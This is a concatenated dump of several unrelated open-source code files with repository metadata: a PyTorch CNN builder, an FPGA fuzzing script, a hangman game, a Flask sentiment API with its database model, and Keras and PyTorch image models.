# If no stride provided create a vector to set every stride to defualt value of conv2D
stride_list = np.ones(layers_cnn).astype(int)
if(print_var): print("Stride List: {}".format(stride_list))
# Set padding list
if("padding_list" in parameters.keys() and layers_cnn != 0):
padding_list = convertTupleElementToInt(parameters["padding_list"])
# Check padding list length
if(len(padding_list) != layers_cnn): raise Exception("Wrong number of elements in padding_list")
if(print_var): print("Padding List: {}".format(padding_list))
else:
# If no padding provided create a vector to set every pad to defualt value of conv2D
padding_list = np.zeros(layers_cnn).astype(int)
if(print_var): print("Padding List: {}".format(padding_list))
# Set pooling list
if("pooling_list" in parameters.keys() and layers_cnn != 0):
pooling_list = parameters["pooling_list"]
# Check pooling length
if(len(pooling_list) != layers_cnn): raise Exception("Wrong number of elements in pooling_list")
if(print_var): print("Pooling List: {}".format(pooling_list))
else:
# If no pooling provided create a vector of negative number so no pool layer will be added
pooling_list = np.ones(layers_cnn).astype(int) * -1
if(print_var): print("Pooling List: {}".format(pooling_list))
# Set groups list
if("groups_list" in parameters.keys() and layers_cnn != 0):
groups_list = parameters["groups_list"]
# Check group length
if(len(groups_list) != layers_cnn): raise Exception("Wrong number of elements in group_list")
if(print_var): print("Groups List: {}".format(groups_list))
else:
# If no groups provided create a vector of ones number so hte group will be set to its default value of 1
groups_list = np.ones(layers_cnn).astype(int)
if(print_var): print("Groups List: {}".format(groups_list))
# Set Batch Normalization list
if("CNN_normalization_list" in parameters.keys() and layers_cnn != 0):
CNN_normalization_list = parameters["CNN_normalization_list"]
# Check batch_normalization_list list length
if(len(CNN_normalization_list) != layers_cnn): raise Exception("Wrong number of elements in CNN_normalization_list")
if(print_var): print("CNN Normalization: {}".format(CNN_normalization_list))
else:
# If no Batch was provided create a vector of negative number so no Batch layer will be added
CNN_normalization_list = np.ones(layers_cnn).astype(int) * -1
CNN_normalization_list = CNN_normalization_list > 100
if(print_var): print("CNN Normalization: {}".format(CNN_normalization_list))
# Set dropout list
if("dropout_list" in parameters.keys()):
dropout_list = parameters["dropout_list"]
# Check dropout list length
if(len(dropout_list) != layers_cnn + layers_ff + 1): raise Exception("Wrong number of elements in dropout_list")
dropout_list_cnn = dropout_list[0:layers_cnn]
dropout_list_ff = dropout_list[(layers_cnn + 1):]
dropout_flatten = dropout_list[layers_cnn]
if(print_var): print("Dropout List: {}".format(dropout_list))
else:
# If no dropout was provided create a vector of negative number so no dropout layer will be added
dropout_list = np.ones(layers_cnn + layers_ff + 1).astype(int) * -1
dropout_list_cnn = dropout_list[0:layers_cnn]
dropout_list_ff = dropout_list[(layers_cnn + 1):]
dropout_flatten = dropout_list[layers_cnn]
if(print_var): print("Dropout List: {}".format(dropout_list))
# Set bias list
if("bias_list" in parameters.keys()):
bias_list = parameters["bias_list"]
# Check bias list length
if(len(bias_list) != layers_cnn + layers_ff + 1): raise Exception("Wrong number of elements in bias_list")
bias_list_cnn = bias_list[0:layers_cnn]
bias_list_ff = bias_list[(layers_cnn + 1):]
bias_list_flatten = bias_list[layers_cnn]
if(print_var): print("Bias List: {}".format(bias_list))
else:
# If no bias was provided create a vector of negative number so no bias will be added
bias_list = np.ones(layers_cnn + layers_ff + 1).astype(int) * -1
bias_list = bias_list < 1000
bias_list_cnn = bias_list[0:layers_cnn]
bias_list_ff = bias_list[(layers_cnn + 1):]
bias_list_flatten = bias_list[layers_cnn]
if(print_var): print("Bias List: {}".format(bias_list))
# Set neuron list
if("neurons_list" in parameters.keys()):
neurons_list = parameters["neurons_list"]
# Check activation list length
if(len(neurons_list) != layers_ff): raise Exception("Wrong number of elements in neurons_list")
if(layers_ff != 1): neurons_list = convertArrayInTupleList(neurons_list)
if(print_var): print("Neurons List: {}".format(neurons_list))
else:
# raise Exception("No \"Neurons_list\" key inside the paramters dictionary")
neurons_list = []
if(print_var): print("Neurons List: {}".format(neurons_list))
# Add a empty line
if(print_var): print()
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# CNN Construction
# Temporary variable used to track the change in dimensions of the input
if(layers_cnn != 0):
tmp_input = torch.ones((1, filters_list[0][0], parameters["h"], parameters["w"]))
if(tracking_input_dimension):
print("# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ")
print(tmp_input.shape, "\n")
# Temporay list to store the layer
tmp_list = []
# Construction cycle
for kernel, n_filter, stride, padding, pool, activation, normalization, p_dropout, groups, bias in zip(kernel_list, filters_list, stride_list, padding_list, pooling_list, activation_list_cnn, CNN_normalization_list, dropout_list_cnn, groups_list, bias_list_cnn):
# Create the convolutional layer and add to the list
if(groups == 1): tmp_cnn_layer = nn.Conv2d(in_channels = int(n_filter[0]), out_channels = int(n_filter[1]), kernel_size = kernel, stride = stride, padding = padding, bias = bias)
else: tmp_cnn_layer = nn.Conv2d(in_channels = int(n_filter[0]), out_channels = int(n_filter[1]), kernel_size = kernel, stride = stride, padding = padding, groups = groups, bias = bias)
tmp_list.append(tmp_cnn_layer)
# Keep track of the outupt dimension
tmp_input = tmp_cnn_layer(tmp_input)
# Print the input dimensions at this step (if tracking_input_dimension is True)
if(tracking_input_dimension):
print(tmp_cnn_layer)
print(tmp_input.shape, "\n")
# (OPTIONAL) add batch normalization
if(normalization): tmp_list.append(nn.BatchNorm2d(num_features = int(n_filter[1])))
# (OPTIONAL) Add the activation
if(activation != -1): tmp_list.append(act[activation])
# (OPTIONAL) Add max pooling
if(pool != -1):
# Retrieve the pooling list (with a cast to int for the kernel)
pool_kernel = (int(pool[1][0]), int(pool[1][1]))
pool_layer_list = getPoolingList(kernel = pool_kernel)
# Create the pool layer and add to the list.
tmp_pooling_layer = pool_layer_list[pool[0]]
tmp_list.append(tmp_pooling_layer)
# Keep track of the output dimension
tmp_input = tmp_pooling_layer(tmp_input)
# Print the input dimensions at this step (if tracking_input_dimension is True)
if(tracking_input_dimension):
print(tmp_pooling_layer)
print(tmp_input.shape)
# (OPTIONAL) Dropout
if(p_dropout > 0 and p_dropout < 1): tmp_list.append(torch.nn.Dropout(p = p_dropout))
# Creation of the sequential object to store all the layer
self.cnn = nn.Sequential(*tmp_list)
# Plot a separator
if(tracking_input_dimension): print("# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n")
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Flatten layer
self.flatten_neurons = tmp_input.shape[1] * tmp_input.shape[2] * tmp_input.shape[3]
if(layers_ff == 0):
if(activation_flatten != -1): self.flatten_layer = act[activation_flatten]
else: self.flatten_layer = nn.Identity()
if(print_var): print("Flatten layer: {}\n".format(self.flatten_neurons))
else:
if(layers_ff == 1): tmp_flatten_layer = nn.Linear(self.flatten_neurons, neurons_list[0], bias = bias_list_flatten)
else: tmp_flatten_layer = nn.Linear(self.flatten_neurons, neurons_list[0][0], bias = bias_list_flatten)
tmp_list = []
tmp_list.append(tmp_flatten_layer)
if(activation_flatten != -1): tmp_list.append(act[activation_flatten])
if(dropout_flatten > 0 and dropout_flatten < 1): tmp_list.append(torch.nn.Dropout(p = dropout_flatten))
self.flatten_layer = nn.Sequential(*tmp_list)
if(print_var):
if(layers_ff == 1): print("Flatten layer: {}\n".format([self.flatten_neurons, neurons_list[0]]))
else: print("Flatten layer: {}\n".format([self.flatten_neurons, neurons_list[0][0]]))
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Feed-Forward (Linear) construction
if(layers_ff > 1):
# Temporay list to store the layer
tmp_list = []
# Construction cycle
for neurons, activation, p_dropout, bias in zip(neurons_list, activation_list_ff, dropout_list_ff, bias_list_ff):
if(layers_ff == 1 and layers_cnn == 0): # Case for a single layer feed-forward network (perceptron style)
tmp_linear_layer = nn.Linear(parameters["h"] * parameters["w"], neurons, bias = bias)
else:
tmp_linear_layer = nn.Linear(neurons[0], neurons[1], bias = bias)
tmp_list.append(tmp_linear_layer)
# (OPTIONAL) Add the activation
if(activation != -1): tmp_list.append(act[activation])
# (OPTIONAL) Dropout
if(p_dropout > 0 and p_dropout < 1): tmp_list.append(torch.nn.Dropout(p = p_dropout))
# Creation of the sequential object to store all the layer
self.ff = nn.Sequential(*tmp_list)
else: self.ff = []
def forward(self, x):
if(self.layers_cnn != 0):
# Convolutional section
x = self.cnn(x)
# Flatten layer
x = x.view([x.size(0), -1])
x = self.flatten_layer(x)
# Feed-forward (linear) section
if(len(self.ff) > 0): x = self.ff(x)
return x
def printNetwork(self, separator = False):
depth = 0
# Iterate through the module of the network
for name, module in self.named_modules():
# Iterate through the sequential block
# Since in the iteration the sequential blocks and the modules inside the sequential block appear twice I only take the sequenial block
if(type(module) == torch.nn.modules.container.Sequential):
for layer in module:
# Print layer
print("DEPTH:", depth, "\t- ", layer)
# Incrase depth
depth += 1
if(separator): print("\n- - - - - - - - - - - - - - - - - - - - - - - - - - - \n")
if(name == 'cnn'):
# Add reshape "layer"
print("DEPTH:", depth, "\t- ", "x.view([x.size(0), -1])")
if(separator): print("\n- - - - - - - - - - - - - - - - - - - - - - - - - - - \n")
depth += 1
def getMiddleResults(self, x, input_depth, ignore_dropout = True):
actual_depth = 0
# Iterate through the module of the network
for name, module in self.named_modules():
# Iterate through the sequential block
# Since in the iteration the sequential blocks and the modules inside the sequential block appear twice I only take the sequenial block
if(type(module) == torch.nn.modules.container.Sequential):
for layer in module:
# Evaluate the value of the input at this level
x = layer(x)
# If I reach the desire level I stop
if(actual_depth == input_depth): return x
# Increase depth level
actual_depth += 1
# Reshape after the CNN block
if(name == 'cnn'):
x = x.view([x.size(0), -1])
if(actual_depth == input_depth): return x
actual_depth += 1
# If this istruction is reached it means that the input flow inside all the network.
return x
#%%
def convertArrayInTupleList(array):
"""
Convert an array (or a list) of element in a list of tuple where each element is a tuple with two sequential element of the original array/list
Parameters
----------
array : numpy array/list
Returns
-------
tuple_list. List of tuple
Given the input array = [a, b, c, d ...] the tuple_list will be [(a, b), (b, c), (c, d) ...]
"""
tuple_list = []
for i in range(len(array) - 1):
tmp_tuple = (array[i], array[i + 1])
tuple_list.append(tmp_tuple)
return tuple_list
def convertTupleElementToInt(tuple_list):
"""
Convert a list of tuple in the same list of tuple but with tuple elements cast to int
N.B. The tuples must contain two elements
"""
tuple_int_list = []
for tup in tuple_list:
tmp_tuple = (int(tup[0]), int(tup[1]))
tuple_int_list.append(tmp_tuple)
return tuple_int_list
```
|
{
"source": "Jesus89/icestorm-debian",
"score": 2
}
|
#### File: icestorm-debian/icefuzz/make_fflogic.py
```python
from fuzzconfig import *
import numpy as np
import os
os.system("rm -rf work_fflogic")
os.mkdir("work_fflogic")
def random_op():
return np.random.choice(["+", "-", "*", "^", "&", "|"])
def print_seq_op(dst, src1, src2, op, f):
mode = np.random.choice(list("abc"))
negreset = np.random.choice(["!", ""])
enable = np.random.choice(["if (en) ", ""])
if mode == "a":
print(" always @(%sedge clk) begin" % np.random.choice(["pos", "neg"]), file=f)
print(" %s%s <= %s %s %s;" % (enable, dst, src1, op, src2), file=f)
print(" end", file=f)
elif mode == "b":
print(" always @(%sedge clk) begin" % np.random.choice(["pos", "neg"]), file=f)
print(" if (%srst)" % negreset, file=f)
print(" %s <= %d;" % (dst, np.random.randint(2**16)), file=f)
print(" else", file=f)
print(" %s%s <= %s %s %s;" % (enable, dst, src1, op, src2), file=f)
print(" end", file=f)
elif mode == "c":
print(" always @(%sedge clk, %sedge rst) begin" % (np.random.choice(["pos", "neg"]), "neg" if negreset == "!" else "pos"), file=f)
print(" if (%srst)" % negreset, file=f)
print(" %s <= %d;" % (dst, np.random.randint(2**16)), file=f)
print(" else", file=f)
print(" %s%s <= %s %s %s;" % (enable, dst, src1, op, src2), file=f)
print(" end", file=f)
else:
assert False
for idx in range(num):
with open("work_fflogic/fflogic_%02d.v" % idx, "w") as f:
print("module top(input clk, rst, en, input [15:0] a, b, c, d, output [15:0] y, output z);", file=f)
print(" reg [15:0] p, q;", file=f)
print_seq_op("p", "a", "b", random_op(), f)
print_seq_op("q", "c", "d", random_op(), f)
print(" assign y = p %s q, z = clk ^ rst ^ en;" % random_op(), file=f)
print("endmodule", file=f)
with open("work_fflogic/Makefile", "w") as f:
print("all: %s" % " ".join(["fflogic_%02d.bin" % i for i in range(num)]), file=f)
for i in range(num):
print("fflogic_%02d.bin:" % i, file=f)
print("\t-bash ../icecube.sh fflogic_%02d > fflogic_%02d.log 2>&1 && rm -rf fflogic_%02d.tmp || tail fflogic_%02d.log" % (i, i, i, i), file=f)
```
|
{
"source": "Jesus98Sotelo/Hangman-Game-Python",
"score": 4
}
|
#### File: Jesus98Sotelo/Hangman-Game-Python/Hangman-Game.py
```python
import random
import os
import hanged as h
hh = h.HANGMAN_IMAGES
def play(word , underscord):
wordList = list(word)
underscordList = list(underscord)
lyric = ''
while wordList != underscordList or lyric == ' ':
lyric = input('Tu primer intento : ')
accountant = 1
os.system('cls')
for i in range(0, len(wordList)):
if wordList[i] == lyric:
underscordList[i] = wordList[i]
print(' '.join(underscordList).upper())
print("""Ganaste!!!
+----+
|
|
\O/ |
| |
/ \ |
=========
""")
def normalize(s):
replacements = (
("á", "a"),
("é", "e"),
("í", "i"),
("ó", "o"),
("ú", "u"),
)
for a, b in replacements:
s = s.replace(a, b).replace(a.upper(), b.upper())
return s
def read():
with open('./docs/data.txt', 'r', encoding='utf-8') as f:
words = [i.replace('\n', '') for i in f]
random_word = random.randint(0, len(words))
word = words[random_word]
return word
def run():
print("""
____ _ _ _
| _ \ (_) (_) | |
| |_) | _ ___ _ __ __ __ ___ _ __ _ __| | ___ __ _
| _ < | | / _ \ | '_ \ \ \ / / / _ \ | '_ \ | | / _` | / _ \ / _` |
| |_) | | | | __/ | | | | \ V / | __/ | | | | | | | (_| | | (_) | | (_| |
|____/ |_| \___| |_| |_| \_/ \___| |_| |_| |_| \__,_| \___/ \__,_|
_ _
| | | |
| |__| | __ _ _ __ __ _ _ __ ___ __ _ _ __
| __ | / _` | | '_ \ / _` | | '_ ` _ \ / _` | | '_ \
| | | | | (_| | | | | | | (_| | | | | | | | | (_| | | | | |
|_| |_| \__,_| |_| |_| \__, | |_| |_| |_| \__,_| |_| |_|
__/ |
|___/
No te ahorques y adivina la parabra antes,solo contaras con 6 oportunidades.
Instrucciones:
1.- Solo puedes teclear una letra.
2.- Ganas si adivinas la palabra
3.- Pierdes si completas el ahorcado (Cuentas con 6 intestentos)
_____ ____ __ __ ______ _ _ ______ ______ __ __ ____ _____
/ ____| / __ \ | \/ | | ____| | \ | | |___ / | ____| | \/ | / __ \ / ____|
| | | | | | | \ / | | |__ | \| | / / | |__ | \ / | | | | | | (___
| | | | | | | |\/| | | __| | . ` | / / | __| | |\/| | | | | | \___ \
| |____ | |__| | | | | | | |____ | |\ | / /__ | |____ | | | | | |__| | ____) |
\_____| \____/ |_| |_| |______| |_| \_| /_____| |______| |_| |_| \____/ |_____/
""")
print(hh[0])
word = read()
wordNormalize = normalize(word)
underscord = '_' * (len(word))
print(' '.join(underscord))
play(wordNormalize, underscord)
if __name__ == '__main__':
run()
```
|
{
"source": "jesus-acorrales/post-tuto-deployment",
"score": 2
}
|
#### File: src/api/app.py
```python
import sys
import os
import random
from tqdm import tqdm
from flask import Blueprint, request, jsonify, Flask
import torch
import torch.nn.functional as F
import wget
import db
import config
from ml.model import CharacterLevelCNN
from ml.utils import predict_sentiment
app = Flask(__name__)
api = Blueprint('api', __name__)
# Load pytorch model for inference
model_name = 'model_en.pth'
model_path = f'./ml/models/{model_name}'
model = CharacterLevelCNN()
if model_name not in os.listdir('./ml/models/'):
print(f'downloading the trained model {model_name}')
wget.download(
"https://github.com/ahmedbesbes/character-based-cnn/releases/download/model_en_tp_amazon/model_tp_amazon_1014.pth",
out=model_path
)
else:
print('model already saved to api/ml/models')
if torch.cuda.is_available():
trained_weights = torch.load(model_path)
else:
trained_weights = torch.load(model_path, map_location='cpu')
model.load_state_dict(trained_weights)
model.eval()
print('PyTorch model loaded !')
@api.route('/predict', methods=['POST'])
def predict_rating():
'''
Endpoint to predict the rating using the
review's text data.
'''
if request.method == 'POST':
if 'review' not in request.form:
return jsonify({'error': 'no review in body'}), 400
else:
parameters = model.get_model_parameters()
review = request.form['review']
output = predict_sentiment(model, review, **parameters)
return jsonify(float(output))
@api.route('/review', methods=['POST'])
def post_review():
'''
Save review to database.
'''
if request.method == 'POST':
expected_fields = [
'review',
'rating',
'suggested_rating',
'sentiment_score',
'brand',
'user_agent',
'ip_address'
]
if any(field not in request.form for field in expected_fields):
return jsonify({'error': 'Missing field in body'}), 400
query = db.Review.create(**request.form)
return jsonify(query.serialize())
@api.route('/reviews', methods=['GET'])
def get_reviews():
'''
Get all reviews.
'''
if request.method == 'GET':
query = db.Review.select().order_by(db.Review.created_date.desc())
return jsonify([r.serialize() for r in query])
app.register_blueprint(api, url_prefix='/api')
if __name__ == '__main__':
app.run(debug=config.DEBUG, host=config.HOST)
```
#### File: src/api/db.py
```python
import peewee as pw
import config
from datetime import datetime
from playhouse.shortcuts import model_to_dict
db = pw.PostgresqlDatabase(
config.POSTGRES_DB,
user=config.POSTGRES_USER, password=config.POSTGRES_PASSWORD,
host=config.POSTGRES_HOST, port=config.POSTGRES_PORT
)
class BaseModel(pw.Model):
class Meta:
database = db
# Table Description
class Review(BaseModel):
review = pw.TextField()
rating = pw.IntegerField()
suggested_rating = pw.IntegerField()
sentiment_score = pw.FloatField()
brand = pw.TextField()
user_agent = pw.TextField()
ip_address = pw.TextField()
created_date = pw.DateTimeField(default=datetime.now)
def serialize(self):
review_dict = model_to_dict(self)
review_dict["created_date"] = (
review_dict["created_date"].strftime('%Y-%m-%d %H:%M:%S')
)
return review_dict
# Connection and table creation
db.connect()
db.create_tables([Review])
```
|
{
"source": "jesus-a-martinez-v/dermatologist-ai",
"score": 3
}
|
#### File: jesus-a-martinez-v/dermatologist-ai/model.py
```python
import glob
import os
from pathlib import Path
import cv2
import matplotlib.image as mpimg
import numpy as np
from keras import metrics
from keras.applications.inception_resnet_v2 import InceptionResNetV2
from keras.callbacks import EarlyStopping, TensorBoard, ModelCheckpoint, ReduceLROnPlateau
from keras.engine.saving import load_model
from keras.layers import Dense, GlobalAveragePooling2D, Activation, BatchNormalization, LeakyReLU
from keras.models import Model
from keras.preprocessing.image import ImageDataGenerator
from keras.utils.np_utils import to_categorical
BASE_PATH = os.path.join('.', 'data')
TRAIN_DATA = os.path.join(BASE_PATH, 'train')
VALIDATION_DATA = os.path.join(BASE_PATH, 'valid')
TEST_DATA = os.path.join(BASE_PATH, 'test')
MAPPING = {'seborrheic_keratosis': 0,
'melanoma': 1,
'nevus': 2}
def load_dataset(image_directory, dataset):
image_list = []
image_labels = []
image_types = {'seborrheic_keratosis', 'melanoma', 'nevus'}
x_name = f'./{dataset}_images.npy'
y_name = f'./{dataset}_labels.npy'
# Iterate over each subfolder corresponding to the type of image and add the image to the resulting list.
if not Path(x_name).is_file() or not Path(y_name).is_file():
for image_type in image_types:
print('Loading images in folder: {os.path.join(image_directory, image_type)}')
for file in glob.glob(os.path.join(image_directory, image_type, '*')):
image = mpimg.imread(file)
print(image.shape)
image = cv2.resize(image, (299, 299))
print(image.shape)
if image is not None:
image_list.append(image)
image_labels.append(MAPPING[image_type])
image_list = np.array(image_list)
image_labels = np.array(image_labels)
np.save(x_name, image_list)
np.save(y_name, image_labels)
else:
image_list = np.load(x_name)
image_labels = np.load(y_name)
return image_list, image_labels
def get_model(train_all_layers=False):
base_model = InceptionResNetV2(include_top=False, weights='imagenet', input_shape=(299, 299, 3))
x = base_model.output
x = GlobalAveragePooling2D()(x)
x = Dense(1024, kernel_initializer='uniform')(x)
x = BatchNormalization()(x)
x = LeakyReLU()(x)
x = Dense(512, kernel_initializer='uniform')(x)
x = BatchNormalization()(x)
x = LeakyReLU()(x)
x = Dense(3, kernel_initializer='uniform')(x)
x = BatchNormalization()(x)
predictions = Activation('softmax')(x)
model = Model(inputs=base_model.input, outputs=predictions)
if not train_all_layers:
for layer in base_model.layers:
layer.trainable = False
model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['acc', metrics.categorical_accuracy])
return model
def train_model(model,
epochs=50,
batch_size=64,
train_steps_per_epoch=None,
validation_steps=None):
# Data augmentation generators
train_datagen = ImageDataGenerator(rescale=1. / 255,
horizontal_flip=True,
rotation_range=10)
test_datagen = ImageDataGenerator(rescale=1. / 255)
# Actual generators
x_train, y_train = load_dataset(TRAIN_DATA, 'train')
y_train = to_categorical(y_train, num_classes=3)
train_generator = train_datagen.flow(x_train, y_train, batch_size=batch_size)
x_validation, y_validation = load_dataset(VALIDATION_DATA, 'validation')
y_validation = to_categorical(y_validation, num_classes=3)
validation_generator = test_datagen.flow(x_validation, y_validation, batch_size=batch_size)
callbacks = [
TensorBoard(),
EarlyStopping(patience=4),
ModelCheckpoint('weights.{epoch:02d}-{val_loss:.2f}.hdf5'),
ReduceLROnPlateau(monitor='val_loss', factor=0.2, patience=3, min_lr=0.001)
]
if train_steps_per_epoch is None:
train_steps_per_epoch = len(x_train) // batch_size
if validation_steps is None:
validation_steps = len(x_validation) // batch_size
model.fit_generator(train_generator,
steps_per_epoch=train_steps_per_epoch,
epochs=epochs,
validation_data=validation_generator,
validation_steps=validation_steps,
callbacks=callbacks)
def resume_training(weight_file_path,
epochs=50,
batch_size=64,
train_steps_per_epoch=2000,
validation_steps=800):
model = load_model(weight_file_path)
train_model(model, epochs, batch_size, train_steps_per_epoch, validation_steps)
if __name__ == '__main__':
# m = get_model()
# train_model(m, batch_size=16)
# file = './weights.01-1.54.hdf5'
# resume_training(file, batch_size=16, epochs=49)
m = load_model('./weights.02-1.11.hdf5')
x_test, y_test = load_dataset(TEST_DATA, 'test')
print(m.predict(x_test))
```
|
{
"source": "jesus-a-martinez-v/facial-keypoints",
"score": 3
}
|
#### File: jesus-a-martinez-v/facial-keypoints/models.py
```python
import torch.nn as nn
import torch.nn.functional as F
def _flatten(x):
return x.view(x.size(0), -1)
# Reference: https://arxiv.org/pdf/1710.00977.pdf
class NaimishNet(nn.Module):
def __init__(self):
super(NaimishNet, self).__init__()
self.convolution_1 = nn.Conv2d(in_channels=1, out_channels=32, kernel_size=4)
# I.uniform_(self.convolution_1.weight)
self.maxpooling_1 = nn.MaxPool2d(kernel_size=2)
self.dropout_1 = nn.Dropout(p=0.1)
self.convolution_2 = nn.Conv2d(in_channels=32, out_channels=64, kernel_size=3)
# I.uniform_(self.convolution_2.weight)
self.maxpooling_2 = nn.MaxPool2d(kernel_size=2)
self.dropout_2 = nn.Dropout(p=0.2)
self.convolution_3 = nn.Conv2d(in_channels=64, out_channels=128, kernel_size=2)
# I.uniform_(self.convolution_3.weight)
self.maxpooling_3 = nn.MaxPool2d(kernel_size=2)
self.dropout_3 = nn.Dropout(p=0.3)
self.convolution_4 = nn.Conv2d(in_channels=128, out_channels=256, kernel_size=1)
# I.uniform_(self.convolution_4.weight)
self.maxpooling_4 = nn.MaxPool2d(kernel_size=2)
self.dropout_4 = nn.Dropout(p=0.4)
self.fully_connected_1 = nn.Linear(in_features=43264, out_features=1000)
# I.xavier_uniform_(self.fully_connected_1.weight)
self.dropout_5 = nn.Dropout(p=0.5)
self.fully_connected_2 = nn.Linear(in_features=1000, out_features=1000)
# I.xavier_uniform_(self.fully_connected_2.weight)
self.dropout_6 = nn.Dropout(p=0.6)
self.fully_connected_3 = nn.Linear(in_features=1000, out_features=68 * 2)
# I.xavier_uniform_(self.fully_connected_3.weight)
def forward(self, x):
x = self.convolution_1(x)
x = F.elu(x)
x = self.maxpooling_1(x)
x = self.dropout_1(x)
x = self.convolution_2(x)
x = F.elu(x)
x = self.maxpooling_2(x)
x = self.dropout_2(x)
x = self.convolution_3(x)
x = F.elu(x)
x = self.maxpooling_3(x)
x = self.dropout_3(x)
x = self.convolution_4(x)
x = F.elu(x)
x = self.maxpooling_4(x)
x = self.dropout_4(x)
# Flatten
x = _flatten(x)
x = self.fully_connected_1(x)
x = F.elu(x)
x = self.dropout_5(x)
x = self.fully_connected_2(x)
x = self.dropout_6(x)
x = self.fully_connected_3(x)
return x
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.convolution_1 = nn.Conv2d(in_channels=1, out_channels=32, kernel_size=5, stride=1)
# I.uniform_(self.convolution_1.weight)
self.maxpooling_1 = nn.MaxPool2d(kernel_size=2)
self.convolution_2 = nn.Conv2d(in_channels=32, out_channels=64, kernel_size=5, stride=1)
self.maxpooling_2 = nn.MaxPool2d(kernel_size=2)
self.fully_connected_1 = nn.Linear(in_features=179776, out_features=512)
self.dropout_1 = nn.Dropout(0.5)
self.fully_connected_2 = nn.Linear(in_features=512, out_features=68 * 2)
def forward(self, x):
x = self.convolution_1(x)
x = F.relu(x)
x = self.maxpooling_1(x)
x = self.convolution_2(x)
x = F.relu(x)
x = self.maxpooling_2(x)
# Flatten
x = _flatten(x)
x = self.fully_connected_1(x)
x = F.relu(x)
x = self.dropout_1(x)
x = self.fully_connected_2(x)
return x
```
#### File: jesus-a-martinez-v/facial-keypoints/utils.py
```python
def build_path(segment, running_on_floydhub=False):
"""
Builds the full path to `segment`, depending on where we are running our code.
Args
:segment File or directory we want to build the full path to.
"""
if running_on_floydhub:
return '/floyd/input/data/{}'.format(segment)
else:
return 'data/{}'.format(segment)
```
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.